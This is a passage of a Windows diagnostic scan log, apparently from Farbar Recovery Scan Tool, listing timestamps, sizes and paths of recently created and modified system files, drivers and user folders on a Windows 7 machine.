2020-01-15 21:37 - 2020-01-03 04:33 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:33 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:10 - 000009728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sscore.dll
2020-01-15 21:37 - 2020-01-03 04:09 - 000050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe
2020-01-15 21:37 - 2020-01-03 04:05 - 000148480 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2020-01-15 21:37 - 2020-01-03 04:05 - 000062464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2020-01-15 21:37 - 2020-01-03 04:05 - 000017920 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2020-01-15 21:37 - 2020-01-03 04:04 - 000064512 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe
2020-01-15 21:37 - 2020-01-03 04:04 - 000025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe
2020-01-15 21:37 - 2020-01-03 04:04 - 000014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll
2020-01-15 21:37 - 2020-01-03 04:04 - 000007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe
2020-01-15 21:37 - 2020-01-03 04:04 - 000002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe
2020-01-15 21:37 - 2020-01-03 04:02 - 000036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptbase.dll
2020-01-15 21:37 - 2020-01-03 04:02 - 000006144 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:02 - 000004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:02 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:02 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll
2020-01-15 21:37 - 2020-01-03 04:01 - 000338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe
2020-01-15 21:37 - 2020-01-03 04:01 - 000129536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\videoprt.sys
2020-01-15 21:37 - 2020-01-03 04:00 - 000296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2020-01-15 21:37 - 2020-01-03 03:57 - 000464384 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv.sys
2020-01-15 21:37 - 2020-01-03 03:57 - 000406016 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv2.sys
2020-01-15 21:37 - 2020-01-03 03:57 - 000291328 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2020-01-15 21:37 - 2020-01-03 03:57 - 000169984 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srvnet.sys
2020-01-15 21:37 - 2020-01-03 03:57 - 000161280 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2020-01-15 21:37 - 2020-01-03 03:56 - 000129536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2020-01-15 21:37 - 2020-01-03 03:55 - 000112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2020-01-15 21:37 - 2020-01-03 03:55 - 000064512 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\amdk8.sys
2020-01-15 21:37 - 2020-01-03 03:55 - 000062464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\intelppm.sys
2020-01-15 21:37 - 2020-01-03 03:55 - 000060928 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\processr.sys
2020-01-15 21:37 - 2020-01-03 03:55 - 000060928 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\amdppm.sys
2020-01-15 21:37 - 2020-01-03 03:55 - 000044544 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\npfs.sys
2020-01-15 21:37 - 2020-01-03 03:55 - 000030720 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2020-01-15 21:37 - 2019-12-31 04:04 - 000492032 _____ (Microsoft Corporation) C:\Windows\system32\EOSNotify.exe
2020-01-15 21:37 - 2019-12-18 18:45 - 000390536 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2020-01-15 21:37 - 2019-12-18 17:48 - 000341896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2020-01-15 21:37 - 2019-12-17 03:39 - 025754624 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2020-01-15 21:37 - 2019-12-17 02:18 - 002724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2020-01-15 21:37 - 2019-12-17 02:18 - 000004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2020-01-15 21:37 - 2019-12-17 02:06 - 002910720 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2020-01-15 21:37 - 2019-12-17 02:04 - 000580096 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2020-01-15 21:37 - 2019-12-17 02:04 - 000417280 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2020-01-15 21:37 - 2019-12-17 02:04 - 000066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2020-01-15 21:37 - 2019-12-17 02:04 - 000048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2020-01-15 21:37 - 2019-12-17 02:03 - 000088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2020-01-15 21:37 - 2019-12-17 01:57 - 000054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2020-01-15 21:37 - 2019-12-17 01:56 - 000034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2020-01-15 21:37 - 2019-12-17 01:54 - 000615936 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2020-01-15 21:37 - 2019-12-17 01:53 - 005500928 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2020-01-15 21:37 - 2019-12-17 01:52 - 020290048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2020-01-15 21:37 - 2019-12-17 01:52 - 000814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2020-01-15 21:37 - 2019-12-17 01:52 - 000797184 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2020-01-15 21:37 - 2019-12-17 01:52 - 000144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2020-01-15 21:37 - 2019-12-17 01:52 - 000116224 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2020-01-15 21:37 - 2019-12-17 01:49 - 002724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2020-01-15 21:37 - 2019-12-17 01:45 - 000969216 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2020-01-15 21:37 - 2019-12-17 01:42 - 000489984 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2020-01-15 21:37 - 2019-12-17 01:37 - 000496640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2020-01-15 21:37 - 2019-12-17 01:37 - 000062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2020-01-15 21:37 - 2019-12-17 01:36 - 000341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec
2020-01-15 21:37 - 2019-12-17 01:36 - 000077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2020-01-15 21:37 - 2019-12-17 01:36 - 000047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2020-01-15 21:37 - 2019-12-17 01:35 - 000107520 _____ (Microsoft Corporation) C:\Windows\system32\inseng.dll
2020-01-15 21:37 - 2019-12-17 01:35 - 000087552 _____ (Microsoft Corporation) C:\Windows\system32\tdc.ocx
2020-01-15 21:37 - 2019-12-17 01:35 - 000064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2020-01-15 21:37 - 2019-12-17 01:33 - 002304000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2020-01-15 21:37 - 2019-12-17 01:32 - 000199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2020-01-15 21:37 - 2019-12-17 01:31 - 000092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2020-01-15 21:37 - 2019-12-17 01:30 - 000047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2020-01-15 21:37 - 2019-12-17 01:30 - 000030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2020-01-15 21:37 - 2019-12-17 01:29 - 000315392 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2020-01-15 21:37 - 2019-12-17 01:28 - 000476160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2020-01-15 21:37 - 2019-12-17 01:27 - 000662528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2020-01-15 21:37 - 2019-12-17 01:27 - 000152064 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll
2020-01-15 21:37 - 2019-12-17 01:27 - 000115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2020-01-15 21:37 - 2019-12-17 01:26 - 000620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2020-01-15 21:37 - 2019-12-17 01:18 - 000416256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2020-01-15 21:37 - 2019-12-17 01:18 - 000262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2020-01-15 21:37 - 2019-12-17 01:16 - 000809472 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2020-01-15 21:37 - 2019-12-17 01:16 - 000728064 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2020-01-15 21:37 - 2019-12-17 01:14 - 015445504 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2020-01-15 21:37 - 2019-12-17 01:14 - 002132992 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2020-01-15 21:37 - 2019-12-17 01:14 - 001359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2020-01-15 21:37 - 2019-12-17 01:14 - 000073216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tdc.ocx
2020-01-15 21:37 - 2019-12-17 01:14 - 000060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2020-01-15 21:37 - 2019-12-17 01:13 - 000091136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inseng.dll
2020-01-15 21:37 - 2019-12-17 01:11 - 000168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2020-01-15 21:37 - 2019-12-17 01:10 - 000076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2020-01-15 21:37 - 2019-12-17 01:09 - 000279040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2020-01-15 21:37 - 2019-12-17 01:08 - 000130048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\occache.dll
2020-01-15 21:37 - 2019-12-17 01:04 - 004859392 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2020-01-15 21:37 - 2019-12-17 01:03 - 004112384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2020-01-15 21:37 - 2019-12-17 01:02 - 000230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2020-01-15 21:37 - 2019-12-17 01:01 - 002058752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2020-01-15 21:37 - 2019-12-17 01:01 - 000696320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2020-01-15 21:37 - 2019-12-17 01:00 - 001155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2020-01-15 21:37 - 2019-12-17 00:56 - 013838336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2020-01-15 21:37 - 2019-12-17 00:52 - 001566720 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2020-01-15 21:37 - 2019-12-17 00:43 - 004387840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2020-01-15 21:37 - 2019-12-17 00:41 - 000800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2020-01-15 21:37 - 2019-12-17 00:39 - 001331712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2020-01-15 21:37 - 2019-12-17 00:38 - 000710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2020-01-15 21:37 - 2019-12-12 04:35 - 000271872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tsmf.dll
2020-01-15 21:37 - 2019-12-12 04:34 - 000253952 _____ (Microsoft) C:\Windows\SysWOW64\DShowRdpFilter.dll
2020-01-15 21:37 - 2019-12-12 04:28 - 000301568 _____ (Microsoft Corporation) C:\Windows\system32\tsmf.dll
2020-01-15 21:37 - 2019-12-12 04:27 - 000284160 _____ (Microsoft) C:\Windows\system32\DShowRdpFilter.dll
2020-01-15 21:37 - 2019-12-10 10:36 - 000375008 _____ (Microsoft Corporation) C:\Windows\system32\clfs.sys
2020-01-15 21:37 - 2019-12-10 09:38 - 001549312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tquery.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 001400320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssrch.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 001177088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000666624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssvp.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000544768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wiaaut.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000364544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\StructuredQuery.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000337408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssph.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000328704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shsvcs.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000203264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sti.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000197120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssphtb.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000179712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsvc.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000113664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wiadss.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000106496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptnet.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000104448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssitlb.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000059392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msscntrs.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000034816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssprxy.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 003165184 _____ (Microsoft Corporation) C:\Windows\system32\wucltux.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 002319360 _____ (Microsoft Corporation) C:\Windows\system32\tquery.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 002222080 _____ (Microsoft Corporation) C:\Windows\system32\mssrch.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 001484800 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000778240 _____ (Microsoft Corporation) C:\Windows\system32\mssvp.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000670208 _____ (Microsoft Corporation) C:\Windows\system32\wiaaut.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000583168 _____ (Microsoft Corporation) C:\Windows\system32\wiaservc.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000491520 _____ (Microsoft Corporation) C:\Windows\system32\mssph.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000486912 _____ (Microsoft Corporation) C:\Windows\system32\StructuredQuery.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000371712 _____ (Microsoft Corporation) C:\Windows\system32\shsvcs.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000295424 _____ (Microsoft Corporation) C:\Windows\system32\sti.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000288256 _____ (Microsoft Corporation) C:\Windows\system32\mssphtb.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000229376 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000191488 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000149504 _____ (Microsoft Corporation) C:\Windows\system32\sti_ci.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000141824 _____ (Microsoft Corporation) C:\Windows\system32\wiadss.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000141824 _____ (Microsoft Corporation) C:\Windows\system32\cryptnet.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000115200 _____ (Microsoft Corporation) C:\Windows\system32\mssitlb.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000099840 _____ (Microsoft Corporation) C:\Windows\system32\mssprxy.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000098816 _____ (Microsoft Corporation) C:\Windows\system32\wudriver.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000075264 _____ (Microsoft Corporation) C:\Windows\system32\msscntrs.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000067072 _____ (Microsoft Corporation) C:\Windows\system32\wiarpc.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000014848 _____ (Microsoft Corporation) C:\Windows\system32\wiatrace.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000014336 _____ (Microsoft Corporation) C:\Windows\system32\msshooks.dll
2020-01-15 21:37 - 2019-12-10 09:23 - 000573440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapi.dll
2020-01-15 21:37 - 2019-12-10 09:22 - 000428544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SearchIndexer.exe
2020-01-15 21:37 - 2019-12-10 09:22 - 000164352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SearchProtocolHost.exe
2020-01-15 21:37 - 2019-12-10 09:22 - 000093184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wudriver.dll
2020-01-15 21:37 - 2019-12-10 09:22 - 000086528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SearchFilterHost.exe
2020-01-15 21:37 - 2019-12-10 09:22 - 000030208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wups.dll
2020-01-15 21:37 - 2019-12-10 09:22 - 000012800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wiatrace.dll
2020-01-15 21:37 - 2019-12-10 09:22 - 000009728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msshooks.dll
2020-01-15 21:37 - 2019-12-10 09:17 - 006136320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2020-01-15 21:37 - 2019-12-10 09:17 - 002651136 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2020-01-15 21:37 - 2019-12-10 09:16 - 000709120 _____ (Microsoft Corporation) C:\Windows\system32\wuapi.dll
2020-01-15 21:37 - 2019-12-10 09:16 - 000140288 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe
2020-01-15 21:37 - 2019-12-10 09:16 - 000037888 _____ (Microsoft Corporation) C:\Windows\system32\wups2.dll
2020-01-15 21:37 - 2019-12-10 09:16 - 000036864 _____ (Microsoft Corporation) C:\Windows\system32\wups.dll
2020-01-15 21:37 - 2019-12-10 09:16 - 000012288 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\serscan.sys
2020-01-15 21:37 - 2019-12-10 09:15 - 000594432 _____ (Microsoft Corporation) C:\Windows\system32\SearchIndexer.exe
2020-01-15 21:37 - 2019-12-10 09:15 - 000249856 _____ (Microsoft Corporation) C:\Windows\system32\SearchProtocolHost.exe
2020-01-15 21:37 - 2019-12-10 09:14 - 000113664 _____ (Microsoft Corporation) C:\Windows\system32\SearchFilterHost.exe
2020-01-15 21:37 - 2019-12-10 09:01 - 003233280 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2020-01-15 21:37 - 2019-12-10 08:56 - 000754176 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\http.sys
2020-01-15 21:37 - 2019-12-10 07:17 - 007084032 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2020-01-13 19:45 - 2020-01-13 19:45 - 000000668 _____ C:\Users\Public\Desktop\A bootable USB.lnk
2020-01-13 19:45 - 2020-01-13 19:45 - 000000668 _____ C:\ProgramData\Desktop\A bootable USB.lnk
==================== One month (modified) ==================
(If an entry is included in the fixlist, the file/folder will be moved.)
2020-02-07 20:54 - 2019-05-12 10:51 - 000000000 ____D C:\Program Files\SoftEther VPN Client
2020-02-07 20:54 - 2018-01-07 19:36 - 000000000 ____D C:\Users\Jomko\AppData\LocalLow\Mozilla
2020-02-07 20:52 - 2009-07-14 05:45 - 000027360 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2020-02-07 20:52 - 2009-07-14 05:45 - 000027360 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2020-02-07 20:51 - 2009-07-14 06:13 - 000006170 _____ C:\Windows\system32\PerfStringBackup.INI
2020-02-07 20:51 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\inf
2020-02-07 20:49 - 2018-01-12 17:01 - 000000000 ____D C:\Program Files (x86)\SpeedFan
2020-02-07 20:44 - 2018-01-07 19:33 - 000000000 __SHD C:\Users\Jomko\IntelGraphicsProfiles
2020-02-07 20:44 - 2018-01-07 19:27 - 000000000 ____D C:\ProgramData\NVIDIA
2020-02-07 20:44 - 2009-07-14 06:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2020-02-07 20:41 - 2018-02-01 14:17 - 000000000 ____D C:\AdwCleaner
2020-02-06 21:09 - 2018-02-13 09:42 - 000000000 ____D C:\Windows\SysWOW64\Macromed
2020-02-06 21:09 - 2018-01-07 22:45 - 000003372 _____ C:\Windows\system1AKVrrKGSDtbLrcW77HPEwrJM2Ej2yFNYw
2020-02-06 21:09 - 2018-01-07 22:45 - 000003244 _____ C:\Windows\system1GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGie
2020-01-26 22:57 - 2018-01-08 09:18 - 000001024 ____H C:\AMTAG.BIN
2020-01-26 21:01 - 2009-07-14 06:08 - 000032566 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2020-01-26 20:16 - 2018-06-15 20:12 - 000037692 _____ C:\Windows\ntbtlog.txt
2020-01-26 20:13 - 2009-07-14 05:45 - 000012288 _____ C:\Windows\system32\umstartup.etl
2020-01-26 15:18 - 2018-02-15 20:31 - 000000000 ____D C:\Users\Jomko\AppData\Local\CrashDumps
2020-01-24 21:54 - 2018-01-16 15:01 - 000000000 ____D C:\Windows\Minidump
2020-01-24 16:33 - 2018-01-08 18:51 - 000000000 ____D C:\Users\Jomko\AppData\Roaming\FileZilla
2020-01-23 00:40 - 2018-01-07 22:46 - 000002245 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2020-01-23 00:40 - 2018-01-07 22:46 - 000002204 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2020-01-23 00:40 - 2018-01-07 22:46 - 000002204 _____ C:\ProgramData\Desktop\Google Chrome.lnk
2020-01-22 23:07 - 2018-01-11 14:10 - 000000000 ____D C:\ProgramData\Package Cache
2020-01-22 23:06 - 2018-01-07 22:53 - 000000000 ____D C:\Portable
2020-01-22 20:07 - 2018-05-28 20:39 - 000000000 ____D C:\Users\Jomko\Documents\Bluetooth Folder
2020-01-22 20:05 - 2009-07-14 03:34 - 000000215 _____ C:\Windows\system.ini
2020-01-22 20:04 - 2009-07-14 03:34 - 095895552 _____ C:\Windows\system32\config\SOFTWARE.bak
2020-01-22 20:04 - 2009-07-14 03:34 - 023920640 _____ C:\Windows\system32\config\SYSTEM.bak
2020-01-22 20:04 - 2009-07-14 03:34 - 001847296 _____ C:\Windows\system32\config\DEFAULT.bak
2020-01-22 20:04 - 2009-07-14 03:34 - 000061440 _____ C:\Windows\system32\config\SAM.bak
2020-01-22 20:04 - 2009-07-14 03:34 - 000028672 _____ C:\Windows\system32\config\SECURITY.bak
2020-01-22 18:06 - 2019-05-01 00:02 - 000000000 ____D C:\Windows\SysWOW64\NV
2020-01-22 18:06 - 2019-05-01 00:02 - 000000000 ____D C:\Windows\system32\NV
2020-01-22 17:10 - 2019-10-20 16:56 - 000000000 ____D C:\Users\Jomko\Desktop\Staré údaje Firefoxu
2020-01-22 15:00 - 2018-01-07 19:36 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2020-01-22 13:31 - 2018-01-11 23:49 - 000000000 ____D C:\Users\Jomko\AppData\Local\ElevatedDiagnostics
